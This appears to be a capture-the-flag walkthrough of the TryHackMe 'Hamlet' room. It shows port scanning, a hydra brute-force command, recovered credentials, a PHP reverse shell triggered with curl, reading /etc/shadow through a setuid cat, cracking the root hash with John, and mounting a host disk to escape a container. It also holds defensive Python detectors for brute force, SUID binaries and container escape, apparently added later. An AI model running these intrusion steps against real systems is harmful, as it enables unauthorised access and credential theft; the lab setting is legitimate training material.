Hamlet (FTP, Web, Hydra, Container)

First, we enumerate the target with rustscan.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet  
╰─➤  rustscan -a 10.10.74.234 -- -A | tee rust.log
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/hnl/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.74.234:21
Open 10.10.74.234:22
Open 10.10.74.234:80
Open 10.10.74.234:501
Open 10.10.74.234:8000
Open 10.10.74.234:8080
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-22 04:38 +0630
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 04:38
Completed NSE at 04:38, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 04:38
Completed NSE at 04:38, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 04:38
Completed NSE at 04:38, 0.00s elapsed
Initiating Ping Scan at 04:38
Scanning 10.10.74.234 [2 ports]
Completed Ping Scan at 04:38, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:38
Completed Parallel DNS resolution of 1 host. at 04:38, 0.32s elapsed
DNS resolution of 1 IPs took 0.32s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 04:38
Scanning 10.10.74.234 [6 ports]
Discovered open port 22/tcp on 10.10.74.234
Discovered open port 8080/tcp on 10.10.74.234
Discovered open port 21/tcp on 10.10.74.234
Discovered open port 80/tcp on 10.10.74.234
Discovered open port 8000/tcp on 10.10.74.234
Discovered open port 501/tcp on 10.10.74.234
Completed Connect Scan at 04:38, 0.33s elapsed (6 total ports)
Initiating Service scan at 04:38
Scanning 6 services on 10.10.74.234
Completed Service scan at 04:38, 28.66s elapsed (6 services on 1 host)
NSE: Script scanning 10.10.74.234.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 04:38
NSE: [ftp-bounce 10.10.74.234:21] PORT response: 500 Illegal PORT command.
Completed NSE at 04:38, 13.82s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 04:38
Completed NSE at 04:38, 1.02s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 04:38
Completed NSE at 04:38, 0.00s elapsed
Nmap scan report for 10.10.74.234
Host is up, received syn-ack (0.28s latency).
Scanned at 2022-04-22 04:38:07 +0630 for 45s

PORT     STATE SERVICE    REASON  VERSION
21/tcp   open  ftp        syn-ack vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rwxr-xr-x    1 0        0             113 Sep 15  2021 password-policy.md
|_-rw-r--r--    1 0        0            1425 Sep 15  2021 ufw.status
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.9.0.2
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh        syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a0:ef:4c:32:28:a6:4c:7f:60:d6:a6:63:32:ac:ab:27 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5/i3O28uWolhittypXr6mAEk+XOV998o/e/3wIWpGq9J1GhtGc3J4uwYpBt7SiS3mZivq9D5jgFhqhHb6zlBsQmGUnXUnQNYyqrBmGnyl4urp5IuV1sRCdNXQdt/lf6Z9A807OPuCkzkAexFUV28eXqdXpRsXXkqgkl5DCm2WEtV7yxPIbGlcmX+arDT9A5kGTZe9rNDdqzSafz0aVKRWoTHGHuqVmq0oPD3Cc3oYfoLu7GTJV+Cy6Hxs3s6oUVcruoi1JYvbxC9whexOr+NSZT9mGxDSDLS6jEMim2DQ+hNhiT49JXcMXhQ2nOYqBXLZF0OYyNKaGdgG35CIT40z
|   256 5a:6d:1a:39:97:00:be:c7:10:6e:36:5c:7f:ca:dc:b2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHtt/3Q8agNKO48Zw3srosCs+bfCx47O+i4tBUX7VGMSpzTJQS3s4DBhGvrvO+d/u9B4e9ZBgWSqo+aDqGsTZxQ=
|   256 0b:77:40:b2:cc:30:8d:8e:45:51:fa:12:7c:e2:95:c7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIN4jv01JeDGsDfhWIJMF8HBv26FI18VLpBeNoiSGbKVp
80/tcp   open  http       syn-ack lighttpd 1.4.45
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: lighttpd/1.4.45
|_http-title: Hamlet Annotation Project
501/tcp  open  tcpwrapped syn-ack
8000/tcp open  http       syn-ack Apache httpd 2.4.48 ((Debian))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.48 (Debian)
|_http-title: Site doesn't have a title (text/html).
8080/tcp open  http-proxy syn-ack
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 500 
|     Content-Type: application/json;charset=UTF-8
|     Date: Thu, 21 Apr 2022 22:07:15 GMT
|     Connection: close
|     {"timestamp":1650578836324,"status":500,"error":"Internal Server Error","exception":"org.springframework.security.web.firewall.RequestRejectedException","message":"The request was rejected because the URL contained a potentially malicious String "%2e"","path":"/nice%20ports%2C/Tri%6Eity.txt%2ebak"}
|   GetRequest: 
|     HTTP/1.1 302 
|     Set-Cookie: JSESSIONID=F8DCBDEE2802FAC1360A8FCD3F336AAF; Path=/; HttpOnly
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Cache-Control: no-cache, no-store, max-age=0, must-revalidate
|     Pragma: no-cache
|     Expires: 0
|     X-Frame-Options: SAMEORIGIN
|     Location: http://localhost:8080/login.html
|     Content-Length: 0
|     Date: Thu, 21 Apr 2022 22:07:14 GMT
|     Connection: close
|   HTTPOptions: 
|     HTTP/1.1 302 
|     Set-Cookie: JSESSIONID=17B11B72A74402B64F4CFCC41497126B; Path=/; HttpOnly
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Cache-Control: no-cache, no-store, max-age=0, must-revalidate
|     Pragma: no-cache
|     Expires: 0
|     X-Frame-Options: SAMEORIGIN
|     Location: http://localhost:8080/login.html
|     Content-Length: 0
|     Date: Thu, 21 Apr 2022 22:07:14 GMT
|     Connection: close
|   RTSPRequest: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Thu, 21 Apr 2022 22:07:15 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 
|_    Request</h1></body></html>
|_http-favicon: Unknown favicon MD5: 0488FACA4C19046B94D07C3EE83CF9D6
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-open-proxy: Proxy might be redirecting requests
| http-title: WebAnno - Log in 
|_Requested resource was http://10.10.74.234:8080/login.html
|_http-trane-info: Problem with XML parsing of /evox/about
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 04:38
Completed NSE at 04:38, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 04:38
Completed NSE at 04:38, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 04:38
Completed NSE at 04:38, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.84 seconds

Port 21

You can't list the directory contents in the normal (active) way.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet  
╰─➤  ftp 10.10.74.234
Connected to 10.10.74.234.
220 (vsFTPd 3.0.3)
Name (10.10.74.234:hnl): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.

You need to enable passive mode.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet  
╰─➤  ftp 10.10.74.234
Connected to 10.10.74.234.
220 (vsFTPd 3.0.3)
Name (10.10.74.234:hnl): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode on.
ftp> dir \
227 Entering Passive Mode (10,10,24,134,199,33).
150 Here comes the directory listing.
-rwxr-xr-x    1 0        0             113 Sep 15  2021 password-policy.md
-rw-r--r--    1 0        0            1425 Sep 15  2021 ufw.status
226 Directory send OK.

Download these two files.

ftp> get password-policy.md
local: password-policy.md remote: password-policy.md
227 Entering Passive Mode (10,10,24,134,195,187).
150 Opening BINARY mode data connection for password-policy.md (113 bytes).
226 Transfer complete.
113 bytes received in 0.00 secs (175.7190 kB/s)
ftp> get ufw.status
local: ufw.status remote: ufw.status
227 Entering Passive Mode (10,10,24,134,197,37).
150 Opening BINARY mode data connection for ufw.status (1425 bytes).
226 Transfer complete.
1425 bytes received in 0.00 secs (1.6314 MB/s)

Read the files. The password policy file is quite interesting.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet  
╰─➤  cat password-policy.md 
# Password Policy

## WebAnno

New passwords should be:

- lowercase
- between 12 and 14 characters long
╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet  
╰─➤  cat ufw.status 
Status: active

To                         Action      From
--                         ------      ----
20/tcp                     ALLOW       Anywhere                  
21/tcp                     ALLOW       Anywhere                  
22/tcp                     ALLOW       Anywhere                  
80/tcp                     ALLOW       Anywhere                  
501/tcp                    ALLOW       Anywhere                  
8080/tcp                   ALLOW       Anywhere                  
8000/tcp                   ALLOW       Anywhere                  
1603/tcp                   ALLOW       Anywhere                  
1564/tcp                   ALLOW       Anywhere                  
50000:50999/tcp            ALLOW       Anywhere                  
20/tcp (v6)                ALLOW       Anywhere (v6)             
21/tcp (v6)                ALLOW       Anywhere (v6)             
22/tcp (v6)                ALLOW       Anywhere (v6)             
80/tcp (v6)                ALLOW       Anywhere (v6)             
501/tcp (v6)               ALLOW       Anywhere (v6)             
8080/tcp (v6)              ALLOW       Anywhere (v6)             
8000/tcp (v6)              ALLOW       Anywhere (v6)             
1603/tcp (v6)              ALLOW       Anywhere (v6)             
1564/tcp (v6)              ALLOW       Anywhere (v6)             
50000:50999/tcp (v6)       ALLOW       Anywhere (v6)

Port 80

You can see the default webpage.

Add the IP address and hostname to /etc/hosts.

echo '10.10.74.234	hamlet.thm' >> /etc/hosts

In robots.txt, you will find the first flag.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet  
╰─➤  curl http://10.10.74.234/robots.txt
User-agent: *
Allow: /

THM{1_most_mechanical_and_dirty_hand}

Enumerate subdirectories with gobuster.

Nothing interesting.

Port 501

You can grab the second flag by connecting to the port with nc and answering the question. Here is the

╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet  
╰─➤  nc 10.10.74.234 501
GRAVEDIGGER
What do you call a person who builds stronger things than a stonemason, a shipbuilder, or a carpenter does?
PENTESTER
The one who builds the gallows to hang people on, since his structure outlives a thousand inhabitants.
THM{2_ophelia_s_grave}

Port 8000

When you browse to http://10.10.74.234:8000/, it shows only some useless text. You will find something after inspecting the page source.

<iframe style="width:100%; height:100%" src="/repository/project/0/document/0/source/hamlet.txt"></iframe>

Let's use gobuster to enumerate it.

Nothing interesting.

Port 8080

When you browse to http://10.10.74.234:8080/login.html, you will see the default WebAnno login page. You can find a username on http://10.10.74.234/, which is ghost. password-policy.md says new passwords should be between 12 and 14 characters long. So, we need to generate a password list from http://10.10.74.234:8080.

cewl -m 12 http://10.10.74.234:8000/repository/project/0/document/0/source/hamlet.txt > pass.txt

Brute-force it with hydra.

hydra -l ghost -P pass.txt 10.10.74.234 -s 8080 http-post-form "/login.html?-1.-loginForm:urlfragment=&username=^USER^&password=^PASS^&Login=Login:'Login failed'"

I successfully brute-forced it using Burp. Here is the complete credential: ghost:vnsanctified
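The write-up only shows the attacker's side of the hydra run. As an added example that is not part of the original post, here is the defender's view: a small detector that reads an access log in Common Log Format (an assumption about how requests to the port-8080 WebAnno login endpoint are logged, e.g. by a reverse proxy) and flags any source that sends a burst of POSTs to /login.html. The log lines are constructed for this example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample access-log lines in Common Log Format, shaped like what
# a proxy in front of the port-8080 WebAnno login would record.
# Not taken from the page: the write-up only shows the attacker's side.
SAMPLE_LOG = [
    '10.9.0.5 - - [22/Apr/2022:04:49:58 +0630] "GET /login.html HTTP/1.1" 200 2170',
    '10.9.0.5 - - [22/Apr/2022:04:50:10 +0630] "POST /login.html?-1.-loginForm HTTP/1.1" 302 0',
    '10.9.0.5 - - [22/Apr/2022:04:55:42 +0630] "POST /login.html?-1.-loginForm HTTP/1.1" 302 0',
] + [
    # a burst of twelve login POSTs from one source within twelve seconds
    f'10.9.0.2 - - [22/Apr/2022:04:51:{sec:02d} +0630] "POST /login.html?-1.-loginForm HTTP/1.1" 302 0'
    for sec in range(12)
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Parse one CLF line into a dict, or return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],  # drop the Wicket ?-1.-loginForm suffix
        "status": int(m["status"]),
    }


def login_attempts(lines, login_path="/login.html"):
    """Yield parsed POSTs to the login page, skipping everything else."""
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == login_path:
            yield rec


def detect_bruteforce(lines, threshold=10, window_seconds=60):
    """Return {ip: peak attempts seen inside one window} for every source that
    sent at least `threshold` login POSTs within `window_seconds`.
    Assumes each source's lines appear in chronological order."""
    windows = defaultdict(deque)
    flagged = {}
    for rec in login_attempts(lines):
        q = windows[rec["ip"]]
        q.append(rec["ts"])
        while (rec["ts"] - q[0]).total_seconds() > window_seconds:
            q.popleft()  # slide the window forward
        if len(q) >= threshold:
            flagged[rec["ip"]] = max(flagged.get(rec["ip"], 0), len(q))
    return flagged


if __name__ == "__main__":
    for ip, peak in detect_bruteforce(SAMPLE_LOG).items():
        print(f"possible login brute force from {ip}: {peak} login POSTs within 60s")
```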

On the project page, you can find a different user.

After you change ophelia's password and log in again, you can find a different FTP password: KEQehFDWwuQbMbKW

You can find the 3rd flag by connecting to FTP with ophelia:vnsanctified

╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet  
╰─➤  ftp 10.10.74.234
Connected to 10.10.74.234.
220 (vsFTPd 3.0.3)
Name (10.10.74.234:hnl): ophelia
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode on.
ftp> ls
227 Entering Passive Mode (10,10,229,96,195,232).
150 Here comes the directory listing.
-rw-r--r--    1 1001     1001           31 Sep 16  2021 flag
226 Directory send OK.
ftp> get flag
local: flag remote: flag
227 Entering Passive Mode (10,10,229,96,197,61).
150 Opening BINARY mode data connection for flag (31 bytes).
226 Transfer complete.
31 bytes received in 0.01 secs (5.9676 kB/s)
ftp> 

You can find the 4th flag in /opt.

ftp> pwd
257 "/home/ophelia" is the current directory
ftp> cd /
250 Directory successfully changed.
ftp> dir
227 Entering Passive Mode (10,10,229,96,198,75).
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Sep 15  2021 bin
drwxr-xr-x    4 0        0            4096 Sep 15  2021 boot
drwxr-xr-x    2 0        0            4096 Sep 15  2021 cdrom
drwxr-xr-x   18 0        0            3760 Apr 22 23:20 dev
drwxr-xr-x   99 0        0            4096 Sep 16  2021 etc
drwxr-xr-x    5 0        0            4096 Sep 15  2021 home
lrwxrwxrwx    1 0        0              34 Sep 15  2021 initrd.img -> boot/initrd.img-4.15.0-156-generic
lrwxrwxrwx    1 0        0              34 Sep 15  2021 initrd.img.old -> boot/initrd.img-4.15.0-156-generic
drwxr-xr-x   23 0        0            4096 Sep 15  2021 lib
drwxr-xr-x    2 0        0            4096 Aug 06  2020 lib64
drwx------    2 0        0           16384 Sep 15  2021 lost+found
drwxr-xr-x    2 0        0            4096 Aug 06  2020 media
drwxr-xr-x    3 0        0            4096 Sep 15  2021 mnt
drwxr-xr-x    5 0        0            4096 Sep 15  2021 opt
dr-xr-xr-x  115 0        0               0 Apr 22 23:20 proc
drwx------    5 0        0            4096 Sep 15  2021 root
drwxr-xr-x   30 0        0            1020 Apr 22 23:25 run
drwxr-xr-x    2 0        0           12288 Sep 15  2021 sbin
drwxr-xr-x    2 0        0            4096 Sep 15  2021 snap
drwxr-xr-x    4 0        0            4096 Sep 15  2021 srv
-rw-------    1 0        0        4111466496 Sep 15  2021 swap.img
dr-xr-xr-x   13 0        0               0 Apr 22 23:20 sys
drwxrwxrwt    9 0        0            4096 Apr 22 23:25 tmp
drwxr-xr-x   10 0        0            4096 Aug 06  2020 usr
drwxr-xr-x   14 0        0            4096 Sep 15  2021 var
lrwxrwxrwx    1 0        0              31 Sep 15  2021 vmlinuz -> boot/vmlinuz-4.15.0-156-generic
lrwxrwxrwx    1 0        0              31 Sep 15  2021 vmlinuz.old -> boot/vmlinuz-4.15.0-156-generic
226 Directory send OK.
ftp> cd /opt
250 Directory successfully changed.
ftp> ls
227 Entering Passive Mode (10,10,229,96,196,56).
150 Here comes the directory listing.
drwx--x--x    4 0        0            4096 Sep 15  2021 containerd
drwxr-xr-x    2 0        0            4096 Sep 15  2021 stage
drwxr-xr-x    2 0        0            4096 Sep 15  2021 web
226 Directory send OK.
ftp> cd stage
250 Directory successfully changed.
ftp> dir
227 Entering Passive Mode (10,10,229,96,197,175).
150 Here comes the directory listing.
-rw-r--r--    1 0        0              29 Sep 16  2021 flag
226 Directory send OK.
ftp> get flag
local: flag remote: flag
227 Entering Passive Mode (10,10,229,96,197,72).
150 Opening BINARY mode data connection for flag (29 bytes).
226 Transfer complete.
29 bytes received in 0.00 secs (20.1855 kB/s)

User

Let's upload a reverse shell.

Request it with curl to trigger the callback.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet  
╰─➤  curl http://10.10.74.234:8000/repository/project/0/document/1/source/rev.php

In the netcat session, we get a reverse shell.

Look for interesting SUID binaries owned by root.

$ find / -type f -user root -perm -4000 2>/dev/null
/bin/umount
/bin/mount
/bin/cat
/bin/su
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
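The setuid cat in that list is the whole privilege-escalation path, so it is exactly what a defender wants to catch first. Below is an added example (not part of the write-up or the room) that compares setuid-root binaries against a baseline; the baseline set is an assumption for this example and should be generated per image, and the embedded find output is the sample from above.

```python
import os
import stat

# Baseline of paths that legitimately carry setuid-root on a typical
# Debian/Ubuntu image. This is an assumption for the example: maintain it
# per image, ideally generated from a known-good build of the same image.
EXPECTED_SUID = {
    "/bin/mount", "/bin/umount", "/bin/su", "/bin/ping",
    "/usr/bin/passwd", "/usr/bin/chfn", "/usr/bin/gpasswd",
    "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/sudo",
}

# Constructed sample: the `find / -type f -user root -perm -4000` output
# shown above, one path per line.
SAMPLE_FIND_OUTPUT = """\
/bin/umount
/bin/mount
/bin/cat
/bin/su
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
"""


def unexpected_suid(paths, baseline=EXPECTED_SUID):
    """Return the setuid-root paths that are not in the baseline, sorted.
    Anything here deserves a look: a setuid cat, for instance, lets every
    local user read root-only files such as /etc/shadow."""
    cleaned = {p.strip() for p in paths if p.strip()}
    return sorted(cleaned - set(baseline))


def scan_live(root="/"):
    """Walk the filesystem like the find command above and return regular
    files owned by uid 0 that have the setuid bit set."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath.startswith(("/proc", "/sys", "/dev")):
            dirnames[:] = []          # do not descend into pseudo filesystems
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)   # lstat: never follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_uid == 0 and st.st_mode & stat.S_ISUID:
                found.append(path)
    return found


def report(paths, baseline=EXPECTED_SUID):
    """One line per unexpected binary, with the remediation command."""
    return [f"UNEXPECTED setuid-root binary: {p} (remove with: chmod u-s {p})"
            for p in unexpected_suid(paths, baseline)]


if __name__ == "__main__":
    for line in report(scan_live()):
        print(line)
```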

With the SUID cat binary, we can read the shadow file.

$ /bin/cat /etc/shadow
root:$y$j9T$.9s2wZRY3hcP/udKIFher1$sIBIYsiMmFlXhKOO4ZDJDXo54byuq7a4xAD0k9jw2m4:18885:0:99999:7:::
daemon:*:18872:0:99999:7:::
bin:*:18872:0:99999:7:::
sys:*:18872:0:99999:7:::
sync:*:18872:0:99999:7:::
games:*:18872:0:99999:7:::
man:*:18872:0:99999:7:::
lp:*:18872:0:99999:7:::
mail:*:18872:0:99999:7:::
news:*:18872:0:99999:7:::
uucp:*:18872:0:99999:7:::
proxy:*:18872:0:99999:7:::
www-data:*:18872:0:99999:7:::
backup:*:18872:0:99999:7:::
list:*:18872:0:99999:7:::
irc:*:18872:0:99999:7:::
gnats:*:18872:0:99999:7:::
nobody:*:18872:0:99999:7:::
_apt:*:18872:0:99999:7:::

$ /bin/cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

Unshadow the file.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet/shadow  
╰─➤  unshadow ./passwd ./shadow > unshadowed

╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet/shadow  
╰─➤  cat unshadowed
root:$y$j9T$.9s2wZRY3hcP/udKIFher1$sIBIYsiMmFlXhKOO4ZDJDXo54byuq7a4xAD0k9jw2m4:0:0:root:/root:/bin/bash

Crack the password using John the Ripper.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet/shadow  
╰─➤  john unshadowed --format=crypt --wordlist=/usr/share/wordlists/rockyou.txt
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
murder           (root)
1g 0:00:01:32 100% 0.01083g/s 53.03p/s 53.03c/s 53.03C/s yessica..FUCKYOU
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Switch to the root user.

$ su root
Password: murder
whoami
root

Read the flag.

cd /root
ls
ls -al
total 20
drwx------ 1 root root 4096 Sep 15  2021 .
drwxr-xr-x 1 root root 4096 Sep 15  2021 ..
-rw-r--r-- 1 root root  571 Apr 10  2021 .bashrc
-rw-r--r-- 1 root root   24 Sep 16  2021 .flag
-rw-r--r-- 1 root root  161 Jul  9  2019 .profile
cat .flag
THM{5_murder_most_foul}

Root

Hmm?? What is dm-0?

ls -al /dev/ | grep disk
crw-rw----  1 root disk     10, 234 Apr 23 01:46 btrfs-control
brw-rw----  1 root disk    253,   0 Apr 23 01:46 dm-0
crw-rw----  1 root disk     10, 237 Apr 23 01:46 loop-control
brw-rw----  1 root disk      7,   0 Apr 23 01:46 loop0
brw-rw----  1 root disk      7,   1 Apr 23 01:46 loop1
brw-rw----  1 root disk      7,   2 Apr 23 01:46 loop2
brw-rw----  1 root disk      7,   3 Apr 23 01:46 loop3
brw-rw----  1 root disk      7,   4 Apr 23 01:46 loop4
brw-rw----  1 root disk      7,   5 Apr 23 01:46 loop5
brw-rw----  1 root disk      7,   6 Apr 23 01:46 loop6
brw-rw----  1 root disk      7,   7 Apr 23 01:46 loop7
brw-rw----  1 root disk    202,   0 Apr 23 01:46 xvda
brw-rw----  1 root disk    202,   1 Apr 23 01:46 xvda1
brw-rw----  1 root disk    202,   2 Apr 23 01:46 xvda2
brw-rw----  1 root disk    202,   3 Apr 23 01:46 xvda3
brw-rw----  1 root disk    202, 112 Apr 23 01:46 xvdh
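What makes dm-0 interesting is that a container is not supposed to see the host's block devices at all, and mounting one additionally needs CAP_SYS_ADMIN. The following check is an added example (not from the original write-up) that rates a container on exactly those two conditions; the device listing embedded in it is a constructed excerpt of the ls output above, and the capability bit number and the sample CapEff masks in the test are standard Linux values.

```python
import os
import stat

CAP_SYS_ADMIN = 21  # capability bit required by mount(2)

# Constructed excerpt of the `ls -al /dev/ | grep disk` output shown above.
SAMPLE_DEV_LISTING = """\
crw-rw----  1 root disk     10, 234 Apr 23 01:46 btrfs-control
brw-rw----  1 root disk    253,   0 Apr 23 01:46 dm-0
crw-rw----  1 root disk     10, 237 Apr 23 01:46 loop-control
brw-rw----  1 root disk      7,   0 Apr 23 01:46 loop0
brw-rw----  1 root disk    202,   0 Apr 23 01:46 xvda
brw-rw----  1 root disk    202,   1 Apr 23 01:46 xvda1
"""


def parse_block_devices(listing):
    """Parse `ls -l` output and return [(name, major, minor)] for every block
    device (type letter 'b'); character devices and other entries are skipped."""
    devices = []
    for line in listing.splitlines():
        parts = line.split()
        # for device nodes ls prints "major, minor" where a size would be
        if len(parts) < 10 or not parts[0].startswith("b"):
            continue
        major, minor = int(parts[4].rstrip(",")), int(parts[5])
        devices.append((parts[-1], major, minor))
    return devices


def host_disk_devices(devices):
    """Keep devices that back real storage (device-mapper, xvd*, sd*, nvme*),
    dropping loop devices, which are not host disks by themselves."""
    return [d for d in devices if not d[0].startswith("loop")]


def has_cap_sys_admin(capeff_hex):
    """True if CAP_SYS_ADMIN (bit 21) is set in a CapEff value as printed in
    /proc/self/status, e.g. '0000003fffffffff' for a fully privileged process."""
    return (int(capeff_hex, 16) >> CAP_SYS_ADMIN) & 1 == 1


def escape_risk(devices, capeff_hex):
    """Rate the container: 'low' if no host disk is visible; 'high' if one is
    (root inside the container can open the device node directly); 'critical'
    if CAP_SYS_ADMIN is also held, because then mounting it is permitted."""
    disks = host_disk_devices(devices)
    if not disks:
        return "low", []
    reasons = ["host block devices visible: " + ", ".join(d[0] for d in disks)]
    if has_cap_sys_admin(capeff_hex):
        reasons.append("CAP_SYS_ADMIN in effective set, so mount(2) is permitted")
        return "critical", reasons
    return "high", reasons


def live_block_devices():
    """Enumerate /dev directly with stat instead of parsing ls."""
    out = []
    for name in os.listdir("/dev"):
        try:
            st = os.lstat(os.path.join("/dev", name))
        except OSError:
            continue
        if stat.S_ISBLK(st.st_mode):
            out.append((name, os.major(st.st_rdev), os.minor(st.st_rdev)))
    return out


def live_capeff():
    """Read the effective capability mask of this process from /proc."""
    try:
        with open("/proc/self/status") as f:
            for line in f:
                if line.startswith("CapEff:"):
                    return line.split()[1]
    except OSError:
        pass
    return "0"


if __name__ == "__main__":
    level, why = escape_risk(live_block_devices(), live_capeff())
    print(f"container escape risk: {level}")
    for r in why:
        print(" -", r)
```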

Mount the disk.

mkdir /root/lol       
mount /dev/dm-0 /root/lol
ls -al /root/lol
total 4015224
drwxr-xr-x 24 root root       4096 Sep 15  2021 .
